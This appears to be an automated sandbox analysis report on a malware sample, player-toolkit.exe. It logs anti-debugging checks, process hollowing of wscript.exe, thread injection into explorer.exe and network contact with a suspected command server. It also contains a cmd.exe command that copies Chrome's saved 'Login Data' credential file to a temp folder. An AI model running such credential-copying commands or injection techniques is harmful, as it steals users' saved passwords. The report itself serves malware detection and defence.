Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1FDE2 mov eax, dword ptr fs:[00000030h]	2_2_02A1FDE2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1FDE2 mov eax, dword ptr fs:[00000030h]	2_2_02A1FDE2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1FDE2 mov eax, dword ptr fs:[00000030h]	2_2_02A1FDE2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A08DF1 mov eax, dword ptr fs:[00000030h]	2_2_02A08DF1
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6DC9 mov eax, dword ptr fs:[00000030h]	2_2_029D6DC9
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6DC9 mov eax, dword ptr fs:[00000030h]	2_2_029D6DC9
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6DC9 mov eax, dword ptr fs:[00000030h]	2_2_029D6DC9
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6DC9 mov ecx, dword ptr fs:[00000030h]	2_2_029D6DC9
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6DC9 mov eax, dword ptr fs:[00000030h]	2_2_029D6DC9
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D6DC9 mov eax, dword ptr fs:[00000030h]	2_2_029D6DC9
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296D5E0 mov eax, dword ptr fs:[00000030h]	2_2_0296D5E0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296D5E0 mov eax, dword ptr fs:[00000030h]	2_2_0296D5E0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A28D34 mov eax, dword ptr fs:[00000030h]	2_2_02A28D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1E539 mov eax, dword ptr fs:[00000030h]	2_2_02A1E539
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]	2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]	2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]	2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]	2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]	2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]	2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]	2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]	2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]	2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]	2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]	2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]	2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02963D34 mov eax, dword ptr fs:[00000030h]	2_2_02963D34
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02984D3B mov eax, dword ptr fs:[00000030h]	2_2_02984D3B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02984D3B mov eax, dword ptr fs:[00000030h]	2_2_02984D3B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02984D3B mov eax, dword ptr fs:[00000030h]	2_2_02984D3B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295AD30 mov eax, dword ptr fs:[00000030h]	2_2_0295AD30
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029DA537 mov eax, dword ptr fs:[00000030h]	2_2_029DA537
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02977D50 mov eax, dword ptr fs:[00000030h]	2_2_02977D50
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02993D43 mov eax, dword ptr fs:[00000030h]	2_2_02993D43
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D3540 mov eax, dword ptr fs:[00000030h]	2_2_029D3540
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297C577 mov eax, dword ptr fs:[00000030h]	2_2_0297C577
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297C577 mov eax, dword ptr fs:[00000030h]	2_2_0297C577
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A03D40 mov eax, dword ptr fs:[00000030h]	2_2_02A03D40
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B0849B mov eax, dword ptr fs:[00000030h]	24_2_04B0849B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]	24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]	24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]	24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]	24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]	24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]	24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]	24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]	24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]	24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]	24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]	24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]	24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB4496 mov eax, dword ptr fs:[00000030h]	24_2_04BB4496
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB14FB mov eax, dword ptr fs:[00000030h]	24_2_04BB14FB
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76CF0 mov eax, dword ptr fs:[00000030h]	24_2_04B76CF0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76CF0 mov eax, dword ptr fs:[00000030h]	24_2_04B76CF0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76CF0 mov eax, dword ptr fs:[00000030h]	24_2_04B76CF0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC8CD6 mov eax, dword ptr fs:[00000030h]	24_2_04BC8CD6
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2BC2C mov eax, dword ptr fs:[00000030h]	24_2_04B2BC2C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC740D mov eax, dword ptr fs:[00000030h]	24_2_04BC740D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC740D mov eax, dword ptr fs:[00000030h]	24_2_04BC740D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC740D mov eax, dword ptr fs:[00000030h]	24_2_04BC740D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]	24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]	24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]	24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]	24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]	24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]	24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]	24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]	24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]	24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]	24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]	24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]	24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]	24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB1C06 mov eax, dword ptr fs:[00000030h]	24_2_04BB1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76C0A mov eax, dword ptr fs:[00000030h]	24_2_04B76C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76C0A mov eax, dword ptr fs:[00000030h]	24_2_04B76C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76C0A mov eax, dword ptr fs:[00000030h]	24_2_04B76C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76C0A mov eax, dword ptr fs:[00000030h]	24_2_04B76C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]	24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]	24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]	24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]	24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]	24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]	24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]	24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]	24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]	24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]	24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]	24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1B477 mov eax, dword ptr fs:[00000030h]	24_2_04B1B477
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h]	24_2_04B2AC7B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h]	24_2_04B2AC7B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h]	24_2_04B2AC7B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h]	24_2_04B2AC7B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h]	24_2_04B2AC7B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h]	24_2_04B2AC7B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h]	24_2_04B2AC7B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h]	24_2_04B2AC7B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h]	24_2_04B2AC7B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h]	24_2_04B2AC7B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2AC7B mov eax, dword ptr fs:[00000030h]	24_2_04B2AC7B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B1746D mov eax, dword ptr fs:[00000030h]	24_2_04B1746D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B8C450 mov eax, dword ptr fs:[00000030h]	24_2_04B8C450
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B8C450 mov eax, dword ptr fs:[00000030h]	24_2_04B8C450
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2A44B mov eax, dword ptr fs:[00000030h]	24_2_04B2A44B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B21DB5 mov eax, dword ptr fs:[00000030h]	24_2_04B21DB5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B21DB5 mov eax, dword ptr fs:[00000030h]	24_2_04B21DB5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B21DB5 mov eax, dword ptr fs:[00000030h]	24_2_04B21DB5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC05AC mov eax, dword ptr fs:[00000030h]	24_2_04BC05AC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BC05AC mov eax, dword ptr fs:[00000030h]	24_2_04BC05AC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B235A1 mov eax, dword ptr fs:[00000030h]	24_2_04B235A1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04AF2D8A mov eax, dword ptr fs:[00000030h]	24_2_04AF2D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04AF2D8A mov eax, dword ptr fs:[00000030h]	24_2_04AF2D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04AF2D8A mov eax, dword ptr fs:[00000030h]	24_2_04AF2D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04AF2D8A mov eax, dword ptr fs:[00000030h]	24_2_04AF2D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04AF2D8A mov eax, dword ptr fs:[00000030h]	24_2_04AF2D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2FD9B mov eax, dword ptr fs:[00000030h]	24_2_04B2FD9B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B2FD9B mov eax, dword ptr fs:[00000030h]	24_2_04B2FD9B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B22581 mov eax, dword ptr fs:[00000030h]	24_2_04B22581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B22581 mov eax, dword ptr fs:[00000030h]	24_2_04B22581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B22581 mov eax, dword ptr fs:[00000030h]	24_2_04B22581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B22581 mov eax, dword ptr fs:[00000030h]	24_2_04B22581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB2D82 mov eax, dword ptr fs:[00000030h]	24_2_04BB2D82
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB2D82 mov eax, dword ptr fs:[00000030h]	24_2_04BB2D82
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB2D82 mov eax, dword ptr fs:[00000030h]	24_2_04BB2D82
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB2D82 mov eax, dword ptr fs:[00000030h]	24_2_04BB2D82
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB2D82 mov eax, dword ptr fs:[00000030h]	24_2_04BB2D82
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB2D82 mov eax, dword ptr fs:[00000030h]	24_2_04BB2D82
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BB2D82 mov eax, dword ptr fs:[00000030h]	24_2_04BB2D82
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BA8DF1 mov eax, dword ptr fs:[00000030h]	24_2_04BA8DF1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B0D5E0 mov eax, dword ptr fs:[00000030h]	24_2_04B0D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B0D5E0 mov eax, dword ptr fs:[00000030h]	24_2_04B0D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BBFDE2 mov eax, dword ptr fs:[00000030h]	24_2_04BBFDE2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BBFDE2 mov eax, dword ptr fs:[00000030h]	24_2_04BBFDE2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BBFDE2 mov eax, dword ptr fs:[00000030h]	24_2_04BBFDE2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BBFDE2 mov eax, dword ptr fs:[00000030h]	24_2_04BBFDE2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76DC9 mov eax, dword ptr fs:[00000030h]	24_2_04B76DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76DC9 mov eax, dword ptr fs:[00000030h]	24_2_04B76DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76DC9 mov eax, dword ptr fs:[00000030h]	24_2_04B76DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76DC9 mov ecx, dword ptr fs:[00000030h]	24_2_04B76DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76DC9 mov eax, dword ptr fs:[00000030h]	24_2_04B76DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B76DC9 mov eax, dword ptr fs:[00000030h]	24_2_04B76DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B7A537 mov eax, dword ptr fs:[00000030h]	24_2_04B7A537
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04BBE539 mov eax, dword ptr fs:[00000030h]	24_2_04BBE539

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000E6217 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_000E6217
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000E572D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	29_2_000E572D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000F3B93 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_000F3B93
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E52F79B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	32_2_6E52F79B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E5347B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_6E5347B3
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E5301F3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_6E5301F3

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 161.47.48.3 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ordertds.com

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread register set: target process: 3388			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Thread register set: target process: 3388			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: A30000

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V

Jump to behavior

Source: explorer.exe, 00000013.00000002.461744913.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000013.00000000.329272246.0000000001980000.00000002.00000001.sdmp, wscript.exe, 00000018.00000002.463458339.0000000003380000.00000002.00000001.sdmp, player-toolkit.exe, 0000001D.00000002.463658512.00000000013A0000.00000002.00000001.sdmp, player-toolkit.exe, 00000020.00000002.462945107.0000000001B20000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000013.00000000.329272246.0000000001980000.00000002.00000001.sdmp, wscript.exe, 00000018.00000002.463458339.0000000003380000.00000002.00000001.sdmp, player-toolkit.exe, 0000001D.00000002.463658512.00000000013A0000.00000002.00000001.sdmp, player-toolkit.exe, 00000020.00000002.462945107.0000000001B20000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000013.00000000.329272246.0000000001980000.00000002.00000001.sdmp, wscript.exe, 00000018.00000002.463458339.0000000003380000.00000002.00000001.sdmp, player-toolkit.exe, 0000001D.00000002.463658512.00000000013A0000.00000002.00000001.sdmp, player-toolkit.exe, 00000020.00000002.462945107.0000000001B20000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000013.00000000.329272246.0000000001980000.00000002.00000001.sdmp, wscript.exe, 00000018.00000002.463458339.0000000003380000.00000002.00000001.sdmp, player-toolkit.exe, 0000001D.00000002.463658512.00000000013A0000.00000002.00000001.sdmp, player-toolkit.exe, 00000020.00000002.462945107.0000000001B20000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Code function: 29_2_000E552B cpuid

29_2_000E552B

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	29_2_00104062
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: GetLocaleInfoW,	29_2_000FC230
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	29_2_00103701
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: EnumSystemLocalesW,	29_2_001039A3
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: EnumSystemLocalesW,	29_2_001039EE
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: EnumSystemLocalesW,	29_2_00103A89
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: EnumSystemLocalesW,	29_2_000FBCCE
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	29_2_00103E8D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: GetLocaleInfoW,	32_2_6E54EF27
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: EnumSystemLocalesW,	32_2_6E54EC49
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	32_2_6E54ECD4
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: EnumSystemLocalesW,	32_2_6E54EB63
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: GetLocaleInfoW,	32_2_6E544B0D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: EnumSystemLocalesW,	32_2_6E54EBAE
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	32_2_6E54E8C1
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: EnumSystemLocalesW,	32_2_6E5445EB
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	32_2_6E54F222
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	32_2_6E54F04D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: GetLocaleInfoW,	32_2_6E54F153

